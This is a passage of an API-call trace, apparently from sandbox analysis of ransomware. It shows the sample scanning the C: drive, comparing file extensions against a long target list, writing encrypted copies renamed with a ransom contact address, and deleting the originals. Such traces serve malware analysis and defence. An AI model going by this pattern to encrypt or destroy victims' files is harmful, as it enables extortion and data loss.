Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.916] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid")) returned 1 [0274.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.916] lstrlenW (lpString=".doc") returned 4 [0274.916] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.916] lstrlenW (lpString=".docx") returned 5 [0274.916] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.916] lstrlenW (lpString=".pdf") returned 4 [0274.916] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.916] lstrlenW (lpString=".xls") returned 4 [0274.916] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.916] lstrlenW (lpString=".xlsx") returned 5 [0274.916] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.917] lstrlenW (lpString=".ppt") returned 4 [0274.917] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.917] lstrlenW (lpString=".zip") returned 4 [0274.917] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.917] lstrlenW (lpString=".rar") returned 4 [0274.917] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.917] lstrlenW (lpString=".bz2") returned 4 [0274.917] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.917] lstrlenW (lpString=".7z") returned 3 [0274.917] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.917] lstrlenW (lpString=".dbf") returned 4 [0274.917] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.917] lstrlenW (lpString=".1cd") returned 4 [0274.917] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.917] lstrlenW (lpString=".jpg") returned 4 [0274.917] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.918] lstrlenW (lpString=".doc") returned 4 [0274.918] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.918] lstrlenW (lpString=".docx") returned 5 [0274.918] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.918] lstrlenW (lpString=".pdf") returned 4 [0274.918] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.918] lstrlenW (lpString=".xls") returned 4 [0274.918] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.918] lstrlenW (lpString=".xlsx") returned 5 [0274.918] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.918] lstrlenW (lpString=".ppt") returned 4 [0274.918] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.918] lstrlenW (lpString=".zip") returned 4 [0274.918] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.918] lstrlenW (lpString=".rar") returned 4 [0274.918] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.918] lstrlenW (lpString=".bz2") returned 4 [0274.918] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.918] lstrlenW (lpString=".7z") returned 3 [0274.918] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.918] lstrlenW (lpString=".dbf") returned 4 [0274.918] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.919] lstrlenW (lpString=".1cd") returned 4 [0274.919] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID") returned 63 [0274.919] lstrlenW (lpString=".jpg") returned 4 [0274.919] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.919] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.919] lstrlenW (lpString="NBOOK_01.MID") returned 12 [0274.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.924] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=5968) returned 1 [0274.924] CloseHandle (hObject=0x31c) returned 1 [0274.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid")) returned 0x20 [0274.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.925] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.925] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0274.925] GetLastError () returned 0x0 [0274.925] ReadFile (in: hFile=0x31c, lpBuffer=0x4050020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x360fed4, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesRead=0x360fed4*=0x1750, lpOverlapped=0x0) returned 1 [0274.926] WriteFile (in: hFile=0x330, lpBuffer=0x4050020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x360fc9c, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesWritten=0x360fc9c*=0x1760, lpOverlapped=0x0) returned 1 [0274.928] ReadFile (in: hFile=0x31c, lpBuffer=0x4050020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x360fed4, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesRead=0x360fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.928] WriteFile (in: hFile=0x330, lpBuffer=0x4050020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x360fc9c, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesWritten=0x360fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.928] SetEndOfFile (hFile=0x330) returned 1 [0274.928] CloseHandle (hObject=0x330) returned 1 [0274.928] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.928] SetEndOfFile (hFile=0x31c) Thread: id = 102 os_tid = 0x688 [0268.877] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x3ae00b8 [0268.877] lstrlenW (lpString="C:") returned 2 [0268.877] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x374fd00 | out: lpFindFileData=0x374fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x65ec78 [0268.877] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0268.877] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0268.877] lstrlenW (lpString="$Recycle.Bin") returned 12 [0268.877] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0268.877] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x4160048 [0268.878] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0268.878] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x374fa84 | out: lpFindFileData=0x374fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x65ecb8 [0268.878] FindNextFileW (in: hFindFile=0x65ecb8, lpFindFileData=0x374fa84 | out: lpFindFileData=0x374fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0268.878] FindNextFileW (in: hFindFile=0x65ecb8, lpFindFileData=0x374fa84 | out: lpFindFileData=0x374fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc81fca60, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xc81fca60, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0268.878] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0268.878] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0268.878] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0268.878] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0268.878] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x4170050 [0268.878] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0268.878] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x374f808 | out: lpFindFileData=0x374f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc81fca60, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xc81fca60, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x63d2c8 [0268.878] FindNextFileW (in: hFindFile=0x63d2c8, lpFindFileData=0x374f808 | out: lpFindFileData=0x374f808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc81fca60, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xc81fca60, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0268.879] FindNextFileW (in: hFindFile=0x63d2c8, lpFindFileData=0x374f808 | out: lpFindFileData=0x374f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc81fca60, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0xc81fca60, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xc81fca60, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0268.879] lstrlenW (lpString="desktop.ini") returned 11 [0268.879] lstrlenW (lpString=".1cd") returned 4 [0268.879] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0268.879] lstrlenW (lpString=".3ds") returned 4 [0268.879] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0268.879] lstrlenW (lpString=".3fr") returned 4 [0268.879] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0268.879] lstrlenW (lpString=".3g2") returned 4 [0268.879] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0268.879] lstrlenW (lpString=".3gp") returned 4 [0268.879] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0268.879] lstrlenW (lpString=".7z") returned 3 [0268.879] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0268.879] lstrlenW (lpString=".accda") returned 6 [0268.879] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0268.879] lstrlenW (lpString=".accdb") returned 6 [0268.879] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0268.879] lstrlenW (lpString=".accdc") returned 6 [0268.879] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0268.879] lstrlenW (lpString=".accde") returned 6 [0268.879] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0268.879] lstrlenW (lpString=".accdt") returned 6 [0268.879] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0268.879] lstrlenW (lpString=".accdw") returned 6 [0268.879] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0268.879] lstrlenW (lpString=".adb") returned 4 [0268.879] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0268.879] lstrlenW (lpString=".adp") returned 4 [0268.879] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0268.879] lstrlenW (lpString=".ai") returned 3 [0268.879] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0268.879] lstrlenW (lpString=".ai3") returned 4 [0268.880] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".ai4") returned 4 [0268.880] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".ai5") returned 4 [0268.880] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".ai6") returned 4 [0268.880] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".ai7") returned 4 [0268.880] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".ai8") returned 4 [0268.880] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".anim") returned 5 [0268.880] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0268.880] lstrlenW (lpString=".arw") returned 4 [0268.880] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".as") returned 3 [0268.880] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0268.880] lstrlenW (lpString=".asa") returned 4 [0268.880] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".asc") returned 4 [0268.880] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".ascx") returned 5 [0268.880] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0268.880] lstrlenW (lpString=".asm") returned 4 [0268.880] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".asmx") returned 5 [0268.880] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0268.880] lstrlenW (lpString=".asp") returned 4 [0268.880] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".aspx") returned 5 [0268.880] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0268.880] lstrlenW (lpString=".asr") returned 4 [0268.880] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0268.880] lstrlenW (lpString=".asx") returned 4 [0268.881] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".avi") returned 4 [0268.881] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".avs") returned 4 [0268.881] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".backup") returned 7 [0268.881] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0268.881] lstrlenW (lpString=".bak") returned 4 [0268.881] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".bay") returned 4 [0268.881] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".bd") returned 3 [0268.881] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0268.881] lstrlenW (lpString=".bin") returned 4 [0268.881] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".bmp") returned 4 [0268.881] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".bz2") returned 4 [0268.881] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".c") returned 2 [0268.881] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0268.881] lstrlenW (lpString=".cdr") returned 4 [0268.881] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".cer") returned 4 [0268.881] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".cf") returned 3 [0268.881] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0268.881] lstrlenW (lpString=".cfc") returned 4 [0268.881] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".cfm") returned 4 [0268.881] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0268.881] lstrlenW (lpString=".cfml") returned 5 [0268.881] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0268.881] lstrlenW (lpString=".cfu") returned 4 [0268.882] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".chm") returned 4 [0268.882] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".cin") returned 4 [0268.882] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".class") returned 6 [0268.882] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0268.882] lstrlenW (lpString=".clx") returned 4 [0268.882] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".config") returned 7 [0268.882] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0268.882] lstrlenW (lpString=".cpp") returned 4 [0268.882] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".cr2") returned 4 [0268.882] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".crt") returned 4 [0268.882] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".crw") returned 4 [0268.882] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".cs") returned 3 [0268.882] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0268.882] lstrlenW (lpString=".css") returned 4 [0268.882] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".csv") returned 4 [0268.882] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".cub") returned 4 [0268.882] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0268.882] lstrlenW (lpString=".dae") returned 4 [0268.883] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".dat") returned 4 [0268.883] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".db") returned 3 [0268.883] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0268.883] lstrlenW (lpString=".dbf") returned 4 [0268.883] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".dbx") returned 4 [0268.883] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".dc3") returned 4 [0268.883] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".dcm") returned 4 [0268.883] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".dcr") returned 4 [0268.883] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".der") returned 4 [0268.883] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".dib") returned 4 [0268.883] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".dic") returned 4 [0268.883] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".dif") returned 4 [0268.883] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".divx") returned 5 [0268.883] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0268.883] lstrlenW (lpString=".djvu") returned 5 [0268.883] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0268.883] lstrlenW (lpString=".dng") returned 4 [0268.883] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".doc") returned 4 [0268.883] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0268.883] lstrlenW (lpString=".docm") returned 5 [0268.883] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0268.883] lstrlenW (lpString=".docx") returned 5 [0268.883] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0268.884] lstrlenW (lpString=".dot") returned 4 [0268.884] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".dotm") returned 5 [0268.884] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0268.884] lstrlenW (lpString=".dotx") returned 5 [0268.884] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0268.884] lstrlenW (lpString=".dpx") returned 4 [0268.884] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".dqy") returned 4 [0268.884] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".dsn") returned 4 [0268.884] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".dt") returned 3 [0268.884] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0268.884] lstrlenW (lpString=".dtd") returned 4 [0268.884] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".dwg") returned 4 [0268.884] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".dwt") returned 4 [0268.884] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".dx") returned 3 [0268.884] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0268.884] lstrlenW (lpString=".dxf") returned 4 [0268.884] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".edml") returned 5 [0268.884] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0268.884] lstrlenW (lpString=".efd") returned 4 [0268.884] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".elf") returned 4 [0268.884] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".emf") returned 4 [0268.884] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".emz") returned 4 [0268.884] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0268.884] lstrlenW (lpString=".epf") returned 4 [0268.885] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".eps") returned 4 [0268.885] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".epsf") returned 5 [0268.885] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0268.885] lstrlenW (lpString=".epsp") returned 5 [0268.885] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0268.885] lstrlenW (lpString=".erf") returned 4 [0268.885] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".exr") returned 4 [0268.885] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".f4v") returned 4 [0268.885] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".fido") returned 5 [0268.885] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0268.885] lstrlenW (lpString=".flm") returned 4 [0268.885] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".flv") returned 4 [0268.885] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".frm") returned 4 [0268.885] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".fxg") returned 4 [0268.885] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".geo") returned 4 [0268.885] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 